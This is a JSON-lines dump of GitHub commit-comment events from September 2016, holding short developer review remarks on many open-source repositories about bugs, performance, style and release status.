{"id":"4614086996","type":"CommitCommentEvent","actor":{"login":"ciaranmcnulty"},"repo":{"name":"Behat/Behat"},"payload":{"comment":{"id":19163295,"position":null,"line":null,"path":null,"commit_id":"c04e67f3a1cfad72b7e79e192e537fb42268af26","created_at":"2016-09-25T11:22:47Z","updated_at":"2016-09-25T11:22:47Z","body":"What's the issue prior to 2.5? Is there a link you could include in the message maybe?\r\n\r\nEither way 👍 for clarity"}},"created_at":"2016-09-25T11:22:47Z"}
{"id":"4614087945","type":"CommitCommentEvent","actor":{"login":"jeifour"},"repo":{"name":"Jisho-org/jisho-notes"},"payload":{"comment":{"id":19163301,"position":7,"line":7,"path":"README.md","commit_id":"a7fc9c8c842109f35e4b49ef2666f55b38dff791","created_at":"2016-09-25T11:23:37Z","updated_at":"2016-09-25T11:23:37Z","body":"What is the behavior if multiple entries overlap in searchable words? I guess Title and Id are probably meant to be unique, what about the list of search words? Will the website render both entries?\r\n(I've noticed that in entry with Id 18 you didn't add とする, maybe because it is used in entry with Id 31.)"}},"created_at":"2016-09-25T11:23:37Z"}
{"id":"4614088401","type":"CommitCommentEvent","actor":{"login":"ThunderGemios10"},"repo":{"name":"mikotoiii/The-Super-Duper-Script-Editor-2"},"payload":{"comment":{"id":19163302,"position":null,"line":null,"path":null,"commit_id":"317ab21dd49f53ac8e9c3143d5500a0e0528fda3","created_at":"2016-09-25T11:23:59Z","updated_at":"2016-09-25T11:23:59Z","body":"@mikotoiii Alright."}},"created_at":"2016-09-25T11:23:59Z"}
{"id":"4614088557","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"darkdh/browser-laptop"},"payload":{"comment":{"id":19163303,"position":null,"line":null,"path":null,"commit_id":"375665a6a66a936d614e7b7c750eb68c89f87ac5","created_at":"2016-09-25T11:24:07Z","updated_at":"2016-09-25T11:24:07Z","body":"++"}},"created_at":"2016-09-25T11:24:07Z"}
{"id":"4614089379","type":"CommitCommentEvent","actor":{"login":"EliezerIsrael"},"repo":{"name":"JonMosenkis/Sefaria-Project"},"payload":{"comment":{"id":19163309,"position":null,"line":null,"path":null,"commit_id":"1a0565d5ea726e79271254810b3377f53895af4f","created_at":"2016-09-25T11:24:53Z","updated_at":"2016-09-25T11:24:53Z","body":"Performance testing shows that this causes slowdown.  Likely because multiple invocations result in repeated fetching from the DB and repeated object creation.\r\n\r\n`/api/texts/Genesis.1` first load\r\n1574578 function calls (1498622 primitive calls) in 5.597 seconds\r\nvs\r\n1920710 function calls (1823430 primitive calls) in 6.275 seconds\r\n\r\n`/api/texts/Genesis.1` second load\r\n953243 function calls (937047 primitive calls) in 3.246 seconds\r\nvs\r\n1299116 function calls (1261614 primitive calls) in 3.965 seconds\r\n"}},"created_at":"2016-09-25T11:24:53Z"}
{"id":"4614091371","type":"CommitCommentEvent","actor":{"login":"bossladykay27"},"repo":{"name":"bossladykay27/octokit.rb"},"payload":{"comment":{"id":19163312,"position":13,"line":53,"path":"spec/octokit_spec.rb","commit_id":"1e61bb47f3b035c8030322326272c9f3a4f981b1","created_at":"2016-09-25T11:26:38Z","updated_at":"2016-09-25T11:26:38Z","body":"End"}},"created_at":"2016-09-25T11:26:38Z"}
{"id":"4614093617","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19163316,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-25T11:28:40Z","updated_at":"2016-09-25T11:28:40Z","body":"Almost the same as the previous fix, but this one will also preserve the master box from being stuck in streaming."}},"created_at":"2016-09-25T11:28:40Z"}
{"id":"4614096043","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"amphp/aerys"},"payload":{"comment":{"id":19163321,"position":9,"line":169,"path":"lib/HPack.php","commit_id":"e271b2a551526e7ebe1054f945c5937d48b70725","created_at":"2016-09-25T11:30:47Z","updated_at":"2016-09-25T11:30:47Z","body":"Now you can delete that inner `continue;` as well."}},"created_at":"2016-09-25T11:30:47Z"}
{"id":"4614098459","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19163325,"position":null,"line":null,"path":null,"commit_id":"aaa29843c324772c73e2539d327f1face3bceaf2","created_at":"2016-09-25T11:32:45Z","updated_at":"2016-09-25T11:32:45Z","body":"Should we close that PR? Is this update not getting to 16.09? That's fine with me I think, just checking status."}},"created_at":"2016-09-25T11:32:45Z"}
{"id":"4614098466","type":"CommitCommentEvent","actor":{"login":"gupta-shantanu"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19163326,"position":53,"line":81,"path":"geocodertest.py","commit_id":"a003b81ac86bf502d44491eb1e7be52bae79489c","created_at":"2016-09-25T11:32:46Z","updated_at":"2016-09-25T11:32:46Z","body":"It's exhaustively listed [here](https://developers.facebook.com/docs/graph-api/reference/page)\r\nFields relevant to us are: location,description,link,cover,website."}},"created_at":"2016-09-25T11:32:46Z"}
{"id":"4614098470","type":"CommitCommentEvent","actor":{"login":"xjj373047546"},"repo":{"name":"xjj373047546/xjj373047546"},"payload":{"comment":{"id":19163327,"position":2,"line":2,"path":"README.md","commit_id":"a9e92cf10bac2dd43f69ad5710ab5e440d37a7e8","created_at":"2016-09-25T11:32:46Z","updated_at":"2016-09-25T11:32:46Z","body":"welcome to our team"}},"created_at":"2016-09-25T11:32:46Z"}
{"id":"4614098828","type":"CommitCommentEvent","actor":{"login":"Tilo15"},"repo":{"name":"Tilo15/PhotoFiddle"},"payload":{"comment":{"id":19163329,"position":20,"line":407,"path":"src/photofiddle.py","commit_id":"5de3efb6eb666bc9e36b94727b01eefade0a442f","created_at":"2016-09-25T11:33:07Z","updated_at":"2016-09-25T11:33:07Z","body":"Needs removing"}},"created_at":"2016-09-25T11:33:07Z"}
{"id":"4614099218","type":"CommitCommentEvent","actor":{"login":"zuhalmazood"},"repo":{"name":"zuhalmazood/imad-2016-app"},"payload":{"comment":{"id":19163330,"position":null,"line":null,"path":null,"commit_id":"6215fb5bf315fa3c0cf26bfea91f68613caf0d8c","created_at":"2016-09-25T11:33:28Z","updated_at":"2016-09-25T11:33:28Z","body":"wel don!"}},"created_at":"2016-09-25T11:33:28Z"}
{"id":"4614099800","type":"CommitCommentEvent","actor":{"login":"stanleyroycrosss"},"repo":{"name":"lamlylom90/-gmail.com"},"payload":{"comment":{"id":19163331,"position":2,"line":2,"path":"README.md","commit_id":"fc560fd7e33ecc47f689c9d3adce268f4c1d4afa","created_at":"2016-09-25T11:33:54Z","updated_at":"2016-09-25T11:33:54Z","body":"Explain sign"}},"created_at":"2016-09-25T11:33:54Z"}
{"id":"4614099941","type":"CommitCommentEvent","actor":{"login":"everzet"},"repo":{"name":"Behat/Behat"},"payload":{"comment":{"id":19163332,"position":null,"line":null,"path":null,"commit_id":"c04e67f3a1cfad72b7e79e192e537fb42268af26","created_at":"2016-09-25T11:34:01Z","updated_at":"2016-09-25T11:34:01Z","body":"Prior to 2.7? https://travis-ci.org/Behat/Behat/jobs/162499449"}},"created_at":"2016-09-25T11:34:01Z"}
{"id":"4614103261","type":"CommitCommentEvent","actor":{"login":"K2rool"},"repo":{"name":"andryyy/mailcow"},"payload":{"comment":{"id":19163336,"position":null,"line":null,"path":null,"commit_id":"e42a7142feaa7df8d44da6649c19a4a3db9fa7c9","created_at":"2016-09-25T11:36:50Z","updated_at":"2016-09-25T11:36:50Z","body":"Much Better idea to use a sensible prefork number, then to generate it based on total memory (Ram+Swap), it worked ok if you run it on a server/vps e.g with only 2Gb ram no swap it come's up with a value in the area of 23-25.\r\n\r\nI run Mailcow on my 32Gb dedicated server with a 4Gb Swap it generates a prefork value in the range of 460 which is just crazy with Sogo using over 4Gb of ram."}},"created_at":"2016-09-25T11:36:50Z"}
{"id":"4614104395","type":"CommitCommentEvent","actor":{"login":"gupta-shantanu"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19163338,"position":null,"line":null,"path":null,"commit_id":"8f334d3ba66b87dd670752f850f4d14844b946cf","created_at":"2016-09-25T11:37:49Z","updated_at":"2016-09-25T11:37:49Z","body":"Error was, our apps were using different versions of the API. Fixed it in e218ab4. Now two new fields are created. Description goes into Details field if it's empty."}},"created_at":"2016-09-25T11:37:49Z"}
{"id":"4614105478","type":"CommitCommentEvent","actor":{"login":"BasThomas"},"repo":{"name":"tryswift/trySwiftNYC"},"payload":{"comment":{"id":19163339,"position":null,"line":null,"path":null,"commit_id":"7e203ab92dbfbbaae87f261829e47894ed2229d0","created_at":"2016-09-25T11:38:52Z","updated_at":"2016-09-25T11:38:52Z","body":"Nice work! I remember having tried this in the best, but I hit some walls and didn't finish it then."}},"created_at":"2016-09-25T11:38:52Z"}
{"id":"4614108503","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19163342,"position":null,"line":null,"path":null,"commit_id":"aaa29843c324772c73e2539d327f1face3bceaf2","created_at":"2016-09-25T11:41:25Z","updated_at":"2016-09-25T11:41:25Z","body":"Now in staging-16.09 052eaed. I *do* think this and the nettle update should get into 16.09."}},"created_at":"2016-09-25T11:41:25Z"}
{"id":"4614109783","type":"CommitCommentEvent","actor":{"login":"sowrabhi"},"repo":{"name":"sowrabhi/calculator"},"payload":{"comment":{"id":19163344,"position":null,"line":null,"path":null,"commit_id":"1cec76f4056e08976479c71717f04aa919b0efcc","created_at":"2016-09-25T11:42:25Z","updated_at":"2016-09-25T11:42:25Z","body":"This program uses switch case. This allows the users to choose the operations which they wish to perform"}},"created_at":"2016-09-25T11:42:25Z"}
{"id":"4614110615","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":19163345,"position":30,"line":0,"path":"qmlui/virtualconsole/vcpage.cpp","commit_id":"d283e5c5cdf9515648b04b7e032f0f470ef2de28","created_at":"2016-09-25T11:43:07Z","updated_at":"2016-09-25T11:43:07Z","body":"If this code is used only with c++11 capable compilers, you may use nullptr instead of NULL."}},"created_at":"2016-09-25T11:43:07Z"}
{"id":"4614112971","type":"CommitCommentEvent","actor":{"login":"drkttt"},"repo":{"name":"drkttt/lab"},"payload":{"comment":{"id":19163346,"position":1,"line":1,"path":"README.md","commit_id":"95bb7118593dd7224bd18ee0d927e0c943d81d98","created_at":"2016-09-25T11:45:11Z","updated_at":"2016-09-25T11:45:11Z","body":"h"}},"created_at":"2016-09-25T11:45:11Z"}
{"id":"4614123527","type":"CommitCommentEvent","actor":{"login":"RabsRincon"},"repo":{"name":"momentum-mod/game"},"payload":{"comment":{"id":19163357,"position":5,"line":72,"path":"mp/src/game/client/momentum/ui/ContactPanel.cpp","commit_id":"db7f7b0431a080b99cd4c5f287f82610289b67c6","created_at":"2016-09-25T11:53:10Z","updated_at":"2016-09-25T11:53:10Z","body":"No, this has to be webdomain macro!"}},"created_at":"2016-09-25T11:53:10Z"}
{"id":"4614125456","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19163362,"position":null,"line":null,"path":null,"commit_id":"375fa7520455b53fad622c0149a473ebee048e15","created_at":"2016-09-25T11:54:54Z","updated_at":"2016-09-25T11:54:54Z","body":"You can trade with me. Mail: thaonguyen0907110699@gmail.com"}},"created_at":"2016-09-25T11:54:54Z"}
{"id":"4614127612","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163365,"position":null,"line":null,"path":null,"commit_id":"c9329d4778383caa1e2db38d94aff179bc78f0d6","created_at":"2016-09-25T11:56:45Z","updated_at":"2016-09-25T11:56:45Z","body":"我有点懵了，为啥我pull了FTimer2之后VS报错啊？"}},"created_at":"2016-09-25T11:56:45Z"}
{"id":"4614127990","type":"CommitCommentEvent","actor":{"login":"longfeier"},"repo":{"name":"longfeier/talk"},"payload":{"comment":{"id":19163366,"position":null,"line":null,"path":null,"commit_id":"e536f57f43b8cc8ced21c9ae27e370e9d724d24a","created_at":"2016-09-25T11:57:08Z","updated_at":"2016-09-25T11:57:08Z","body":"one comment"}},"created_at":"2016-09-25T11:57:08Z"}
{"id":"4614128179","type":"CommitCommentEvent","actor":{"login":"stanleyroycrosss"},"repo":{"name":"google/material-design-icons"},"payload":{"comment":{"id":19163367,"position":null,"line":null,"path":null,"commit_id":"95c4d7afc1909d357a81ec5bfe43f1228342771d","created_at":"2016-09-25T11:57:17Z","updated_at":"2016-09-25T11:57:17Z","body":"I signed it"}},"created_at":"2016-09-25T11:57:17Z"}
{"id":"4614128206","type":"CommitCommentEvent","actor":{"login":"longfeier"},"repo":{"name":"longfeier/talk"},"payload":{"comment":{"id":19163368,"position":null,"line":null,"path":null,"commit_id":"e536f57f43b8cc8ced21c9ae27e370e9d724d24a","created_at":"2016-09-25T11:57:20Z","updated_at":"2016-09-25T11:57:20Z","body":"lalal"}},"created_at":"2016-09-25T11:57:20Z"}
{"id":"4614128470","type":"CommitCommentEvent","actor":{"login":"longfeier"},"repo":{"name":"longfeier/talk"},"payload":{"comment":{"id":19163369,"position":null,"line":null,"path":null,"commit_id":"e536f57f43b8cc8ced21c9ae27e370e9d724d24a","created_at":"2016-09-25T11:57:34Z","updated_at":"2016-09-25T11:57:34Z","body":"i just want to play"}},"created_at":"2016-09-25T11:57:34Z"}
{"id":"4614130503","type":"CommitCommentEvent","actor":{"login":"simon-kyger"},"repo":{"name":"simon-kyger/Game"},"payload":{"comment":{"id":19163372,"position":31,"line":115,"path":"Game/Client/index.html","commit_id":"440a21a138177af919e9d02beba1109b7659900a","created_at":"2016-09-25T11:59:30Z","updated_at":"2016-09-25T11:59:30Z","body":"current implementation. needs work."}},"created_at":"2016-09-25T11:59:30Z"}
{"id":"4614132929","type":"CommitCommentEvent","actor":{"login":"dirkriehle"},"repo":{"name":"AMOS-FUB-2016/amos-ss16-proj1"},"payload":{"comment":{"id":19163376,"position":null,"line":null,"path":null,"commit_id":"82bd06447476d592045065847a011e9376c5dff4","created_at":"2016-09-25T12:01:05Z","updated_at":"2016-09-25T12:01:05Z","body":"Danke!"}},"created_at":"2016-09-25T12:01:05Z"}
{"id":"4614133383","type":"CommitCommentEvent","actor":{"login":"timholy"},"repo":{"name":"timholy/Images.jl"},"payload":{"comment":{"id":19163378,"position":null,"line":null,"path":null,"commit_id":"d36527fde6bed796bfe05692ad16f7a9292fc051","created_at":"2016-09-25T12:01:22Z","updated_at":"2016-09-25T12:01:22Z","body":"@mronian, among other things this significantly changes how color is handled for corner detection. As I was looking over the code, I was wondering whether converting the image to grayscale first might miss something: for example in an image that's half red and half green, but with equal luminance, would have no corners according to this algorithm, yet the line dividing red and green is obviously salient. This implementation uses the full color information in the gradients, converting to a scalar by taking \"dot products\" among the color components. (`dotc` is queued up as a PR to ColorVectorSpace, but has to wait for https://github.com/JuliaGraphics/ColorTypes.jl/pull/51 to be merged and tagged before the tests will pass).\r\n\r\nDoes this seem OK? If so I can contribute a color-specific test."}},"created_at":"2016-09-25T12:01:22Z"}
{"id":"4614134408","type":"CommitCommentEvent","actor":{"login":"Anaab"},"repo":{"name":"Anaab/BestTechReferences"},"payload":{"comment":{"id":19163379,"position":3,"line":12,"path":"References.txt","commit_id":"c60f768adfdf98d6a6b68bc42cc5dac94cc7822e","created_at":"2016-09-25T12:02:14Z","updated_at":"2016-09-25T12:02:14Z","body":"Added By Anaab"}},"created_at":"2016-09-25T12:02:14Z"}
{"id":"4614138922","type":"CommitCommentEvent","actor":{"login":"nigoroll"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":19163391,"position":6,"line":27,"path":"bin/varnishtest/tests/v00020.vtc","commit_id":"c7e56c424679e0ca63ab90c061defc85822bc56c","created_at":"2016-09-25T12:05:59Z","updated_at":"2016-09-25T12:05:59Z","body":"I would have preferred to use this test to actually check the outcome of the operations"}},"created_at":"2016-09-25T12:05:59Z"}
{"id":"4614140073","type":"CommitCommentEvent","actor":{"login":"glebm"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19163394,"position":null,"line":null,"path":null,"commit_id":"a0fdbcc30e82417939dcd33947e7f7dae88e701e","created_at":"2016-09-25T12:06:59Z","updated_at":"2016-09-25T12:06:59Z","body":"cc @timdiggins "}},"created_at":"2016-09-25T12:06:59Z"}
{"id":"4614141624","type":"CommitCommentEvent","actor":{"login":"nigoroll"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":19163398,"position":23,"line":100,"path":"bin/varnishtest/tests/v00020.vtc","commit_id":"c7e56c424679e0ca63ab90c061defc85822bc56c","created_at":"2016-09-25T12:08:14Z","updated_at":"2016-09-25T12:08:14Z","body":"#2014 - I think we should remove req.ttl once we're done with the miss from vcl_hit issue #1799 "}},"created_at":"2016-09-25T12:08:14Z"}
{"id":"4614142146","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"levindixon/readme"},"payload":{"comment":{"id":19163400,"position":null,"line":null,"path":null,"commit_id":"47af6e596ede95a6448ddea174c202e61c5c2c36","created_at":"2016-09-25T12:08:39Z","updated_at":"2016-09-25T12:08:39Z","body":"I happened to see this. Interesting."}},"created_at":"2016-09-25T12:08:39Z"}
{"id":"4614145099","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro-scripts"},"payload":{"comment":{"id":19163406,"position":16,"line":66,"path":"c18486927.lua","commit_id":"87fa54eec4036f9cdcbfd8af3dda34e49692c03e","created_at":"2016-09-25T12:11:04Z","updated_at":"2016-09-25T12:11:04Z","body":"I think it is better to use c18486927.announce_filter[e]={...} since it is possible that a card has two effects which both have declaring effects."}},"created_at":"2016-09-25T12:11:04Z"}
{"id":"4614146296","type":"CommitCommentEvent","actor":{"login":"Konard"},"repo":{"name":"Konard/LinksPlatform"},"payload":{"comment":{"id":19163408,"position":6,"line":556,"path":"Platform/Platform.Data.Kernel/PersistentMemoryManager.c","commit_id":"8ba99f9080ebe1da11ccd2b6b3c5d4f30bc99746","created_at":"2016-09-25T12:12:02Z","updated_at":"2016-09-25T12:12:02Z","body":"Also there is a small bug: `\"db.links\"` should be replaced with `filename`."}},"created_at":"2016-09-25T12:12:02Z"}
{"id":"4614147257","type":"CommitCommentEvent","actor":{"login":"hannesmuehleisen"},"repo":{"name":"ajdamico/asdfree"},"payload":{"comment":{"id":19163412,"position":null,"line":null,"path":null,"commit_id":"79c5bca8acf16cda9a9907599cdbaca02e5594de","created_at":"2016-09-25T12:12:50Z","updated_at":"2016-09-25T12:12:50Z","body":"<img width=\"156\" alt=\"screen shot 2016-09-25 at 14 12 22\" src=\"https://cloud.githubusercontent.com/assets/227792/18815224/1fbead34-832a-11e6-9627-4e211a460125.png\">\r\n\r\nhttps://xkcd.com/1052/"}},"created_at":"2016-09-25T12:12:50Z"}
{"id":"4614149529","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163419,"position":null,"line":null,"path":null,"commit_id":"c9329d4778383caa1e2db38d94aff179bc78f0d6","created_at":"2016-09-25T12:14:45Z","updated_at":"2016-09-25T12:14:45Z","body":"吓得我赶紧试了一试"}},"created_at":"2016-09-25T12:14:45Z"}
{"id":"4614149815","type":"CommitCommentEvent","actor":{"login":"mohamedsakhri"},"repo":{"name":"haecker-felix/gradio"},"payload":{"comment":{"id":19163420,"position":null,"line":null,"path":null,"commit_id":"cb77d09be9e133f8179d36da0355b707ae3f9af8","created_at":"2016-09-25T12:15:01Z","updated_at":"2016-09-25T12:15:01Z","body":"After this commit if the search text is empty the discover button shows the last search results. I think it should show the home window.."}},"created_at":"2016-09-25T12:15:01Z"}
{"id":"4614151198","type":"CommitCommentEvent","actor":{"login":"andryyy"},"repo":{"name":"andryyy/mailcow"},"payload":{"comment":{"id":19163422,"position":null,"line":null,"path":null,"commit_id":"e42a7142feaa7df8d44da6649c19a4a3db9fa7c9","created_at":"2016-09-25T12:16:06Z","updated_at":"2016-09-25T12:16:06Z","body":"Yes, the calculation really sucked. :)"}},"created_at":"2016-09-25T12:16:06Z"}
{"id":"4614151995","type":"CommitCommentEvent","actor":{"login":"chenjindong"},"repo":{"name":"chenjindong/PythonML"},"payload":{"comment":{"id":19163423,"position":3,"line":27,"path":"Pandas/SeriesTest.py","commit_id":"8538fe142c34597dc3dfd83fed5a5fed8cdbc43b","created_at":"2016-09-25T12:16:48Z","updated_at":"2016-09-25T12:16:48Z","body":"gfd"}},"created_at":"2016-09-25T12:16:48Z"}
{"id":"4614155301","type":"CommitCommentEvent","actor":{"login":"lunarpulse"},"repo":{"name":"lunarpulse/ucxl"},"payload":{"comment":{"id":19163426,"position":232,"line":420,"path":"uxcl_teensy_async/uxcl_teensy_async.ino","commit_id":"3029e73582edf251e80713eb40bec65ecbc1a633","created_at":"2016-09-25T12:19:37Z","updated_at":"2016-09-25T12:19:37Z","body":"this can be a function 'setUpVariable"}},"created_at":"2016-09-25T12:19:37Z"}
{"id":"4614155860","type":"CommitCommentEvent","actor":{"login":"getHoony"},"repo":{"name":"getHoony/hello-world"},"payload":{"comment":{"id":19163432,"position":null,"line":null,"path":null,"commit_id":"649796157a44bad24af790091dbeec0d44d16cf4","created_at":"2016-09-25T12:20:05Z","updated_at":"2016-09-25T12:20:05Z","body":"adfa"}},"created_at":"2016-09-25T12:20:05Z"}
{"id":"4614155915","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163433,"position":627,"line":8311,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:20:08Z","updated_at":"2016-09-25T12:20:08Z","body":"do you want to leave you local directory as default here?"}},"created_at":"2016-09-25T12:20:08Z"}
{"id":"4614156103","type":"CommitCommentEvent","actor":{"login":"lunarpulse"},"repo":{"name":"lunarpulse/ucxl"},"payload":{"comment":{"id":19163434,"position":265,"line":472,"path":"uxcl_teensy_async/uxcl_teensy_async.ino","commit_id":"3029e73582edf251e80713eb40bec65ecbc1a633","created_at":"2016-09-25T12:20:16Z","updated_at":"2016-09-25T12:20:16Z","body":"function \"errorProcessing\""}},"created_at":"2016-09-25T12:20:16Z"}
{"id":"4614156170","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163435,"position":637,"line":8321,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:20:19Z","updated_at":"2016-09-25T12:20:19Z","body":"same as above; do you want to leave you local directory as default here?"}},"created_at":"2016-09-25T12:20:19Z"}
{"id":"4614156403","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163436,"position":645,"line":8329,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:20:32Z","updated_at":"2016-09-25T12:20:32Z","body":"one more, do you want to leave you local directory as default here?"}},"created_at":"2016-09-25T12:20:32Z"}
{"id":"4614156717","type":"CommitCommentEvent","actor":{"login":"PoxiaoLZ"},"repo":{"name":"PoxiaoLZ/PoxiaoLZ.github.io"},"payload":{"comment":{"id":19163437,"position":null,"line":null,"path":null,"commit_id":"46377861abcc05acfe4a7ed24bbfda6640d81008","created_at":"2016-09-25T12:20:48Z","updated_at":"2016-09-25T12:20:48Z","body":"What?"}},"created_at":"2016-09-25T12:20:48Z"}
{"id":"4614157002","type":"CommitCommentEvent","actor":{"login":"NaturalmotionStudios"},"repo":{"name":"dragon-drop-scratch/dragon-drop-www"},"payload":{"comment":{"id":19163439,"position":null,"line":null,"path":null,"commit_id":"3573d1b19b102524583d1eb861be264abc461922","created_at":"2016-09-25T12:21:01Z","updated_at":"2016-09-25T12:21:01Z","body":"1000th commit on this project!"}},"created_at":"2016-09-25T12:21:01Z"}
{"id":"4614158593","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19163441,"position":null,"line":null,"path":null,"commit_id":"0637ad6c96898d4811cf7c58349125f126376511","created_at":"2016-09-25T12:22:21Z","updated_at":"2016-09-25T12:22:21Z","body":"I like that commit message, it's how I read all your HL commits!"}},"created_at":"2016-09-25T12:22:21Z"}
{"id":"4614158990","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163443,"position":656,"line":8340,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:22:44Z","updated_at":"2016-09-25T12:22:44Z","body":"based on our discussion in #4, is this `file_directory` default correct?"}},"created_at":"2016-09-25T12:22:44Z"}
{"id":"4614161479","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163444,"position":1285,"line":8360,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:24:49Z","updated_at":"2016-09-25T12:24:49Z","body":"use `unlink`? #4 "}},"created_at":"2016-09-25T12:24:49Z"}
{"id":"4614161614","type":"CommitCommentEvent","actor":{"login":"annachemic"},"repo":{"name":"moevm/pr1-2016-6304"},"payload":{"comment":{"id":19163445,"position":null,"line":null,"path":null,"commit_id":"8399bf227561ef00e251f7e2317c6ccb1e562617","created_at":"2016-09-25T12:24:57Z","updated_at":"2016-09-25T12:24:57Z","body":"For 1st lab"}},"created_at":"2016-09-25T12:24:57Z"}
{"id":"4614161630","type":"CommitCommentEvent","actor":{"login":"ophthal"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19163446,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-25T12:24:57Z","updated_at":"2016-09-25T12:24:57Z","body":"All set.  Will create a new branch going forward:\r\n\r\ncurrent-work-15"}},"created_at":"2016-09-25T12:24:57Z"}
{"id":"4614161814","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19163447,"position":2,"line":2,"path":"resources/views/internlink/index.blade.php","commit_id":"b6bc11e820c16cd34a7f5f54e462bdf5db9df170","created_at":"2016-09-25T12:25:06Z","updated_at":"2016-09-25T12:25:06Z","body":"Oops is it okay for me to remove it in the next commit? I've changed some other files already"}},"created_at":"2016-09-25T12:25:06Z"}
{"id":"4614162029","type":"CommitCommentEvent","actor":{"login":"ifdog"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19163448,"position":null,"line":null,"path":null,"commit_id":"c9329d4778383caa1e2db38d94aff179bc78f0d6","created_at":"2016-09-25T12:25:15Z","updated_at":"2016-09-25T12:25:15Z","body":"一定是因为 .net 提供的Timer太多了 "}},"created_at":"2016-09-25T12:25:15Z"}
{"id":"4614162157","type":"CommitCommentEvent","actor":{"login":"Naios"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19163449,"position":null,"line":null,"path":null,"commit_id":"1c1ef5673329a6a3ffdfb9ce4838a76a9eeede0e","created_at":"2016-09-25T12:25:22Z","updated_at":"2016-09-25T12:25:22Z","body":"You should split it at least into an implementation and a convertion commit"}},"created_at":"2016-09-25T12:25:22Z"}
{"id":"4614164706","type":"CommitCommentEvent","actor":{"login":"timelyportfolio"},"repo":{"name":"abresler/fundManageR"},"payload":{"comment":{"id":19163450,"position":1289,"line":8364,"path":"R/adv_functions.R","commit_id":"c27912904e14838de1010534bd7dfbc74a657071","created_at":"2016-09-25T12:27:35Z","updated_at":"2016-09-25T12:27:35Z","body":"This seems to wipe out everything in Trash/Recycle Bin, which is pretty aggressive and potentially very problematic.  I would suggest removing this (#4) if I understand its purpose."}},"created_at":"2016-09-25T12:27:35Z"}
{"id":"4614164811","type":"CommitCommentEvent","actor":{"login":"fbm-static"},"repo":{"name":"TryGhost/Ghost"},"payload":{"comment":{"id":19163451,"position":null,"line":null,"path":null,"commit_id":"8115d83782c7d2fbcb985b9a6f6f64e8c12346e9","created_at":"2016-09-25T12:27:40Z","updated_at":"2016-09-25T12:27:40Z","body":"OH MY GODD!!!!"}},"created_at":"2016-09-25T12:27:40Z"}
{"id":"4614166747","type":"CommitCommentEvent","actor":{"login":"asadullahwahid"},"repo":{"name":"asadullahwahid/project1"},"payload":{"comment":{"id":19163452,"position":null,"line":null,"path":null,"commit_id":"25194678972ed0251b494dd5e986ab4db5c04738","created_at":"2016-09-25T12:29:23Z","updated_at":"2016-09-25T12:29:23Z","body":"hy"}},"created_at":"2016-09-25T12:29:23Z"}
{"id":"4614170734","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"jstrube/LCIO.jl"},"payload":{"comment":{"id":19163456,"position":null,"line":null,"path":null,"commit_id":"56518c240aa31506ee9a849ef3045665e09d3001","created_at":"2016-09-25T12:32:39Z","updated_at":"2016-09-25T12:32:39Z","body":"this is wrong. you won't be testing the code changes in branches or pr's here"}},"created_at":"2016-09-25T12:32:39Z"}
